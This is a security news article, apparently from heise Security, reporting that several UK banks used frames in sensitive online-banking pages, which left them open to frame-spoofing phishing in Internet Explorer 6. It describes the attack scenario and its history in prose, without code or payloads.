Edward Henning, Jürgen Schmidt
You can't Bank on Security
Testing of UK bank pages reveals possible vulnerabilities
Quite rightly, banks advise their customers to take great care not to fall victim to phishing emails and other online risks. But, as heise Security discovered when checking the on-line pages of British banks, their customers would be a great deal safer if the banks accepted their responsibilities in this, and took much better precautions themselves.
Consider this situation: you receive an email that appears to come from your on-line bank. It tells you how the on-line system has been overhauled, and of new services, particularly how you can upgrade your on-line current account to earn interest. It gives you a link to follow in order to access this. You click on the link, and are taken to the familiar login page of the bank. You are concerned about security, and so you check the page carefully: it looks correct, the address bar contains the correct address, and the little padlock icon at the bottom shows it as an SSL secured page; you click on this icon, and up pops the certificate information, all present and correct. Satisfied, you enter your personal details, PIN, and then encounter an error. "Sorry, the server is experiencing problems, please try again later". After a while, you type in your bank URL directly, and find your account has been emptied. Your personal information had been sent to an attacker, and you have become the victim of a phishing attack.
This kind of attack is indeed possible, if the web pages of your bank have not been sufficiently secured. For at least the last eight years security experts have known about a problem called frame spoofing. In 1998 Microsoft addressed this problem with a patch for Internet Explorer 4 on Windows 3.1. (Yes we really are talking about that long ago the period shortly after DOS). Microsoft explained it quite correctly at the time: "This issue may enable a malicious Web site operator to mimic a legitimate Web site by inserting a window as a frame within the legitimate Web site's window."
Microsoft introduced a protection mechanism against this problem, but unfortunately, up until the present ie. up to and including Internet Explorer 6 they did not activate it by default. (Current beta versions of IE 7 finally have it activated by default in the internet zone.) This is one of the reasons that working with frames is considered insecure by security experts.
Nevertheless, many British banks still work with frames even in the most sensitive areas of their online banking where you enter PINs and TANs (Personal Identification Numbers and Transaction Numbers). This allows potential attackers to create advanced spoofing attacks where even an experienced user would not be able to distinguish between the attacker's page and the real site. Even encryption does not protect from this.
The following demonstrations worked as described at the time of writing this report, using Internet Explorer 6 with default settings. If, for example, you are using Internet Explorer and have optimised it for security following the instructions in the heisec Browsercheck, then the following demonstrations should not work. Naturally, we hope and expect that the banks concerned will fix the problems that we have highlighted, and so we also show here some screenshots of the results of these demonstrations to illustrate the principles involved.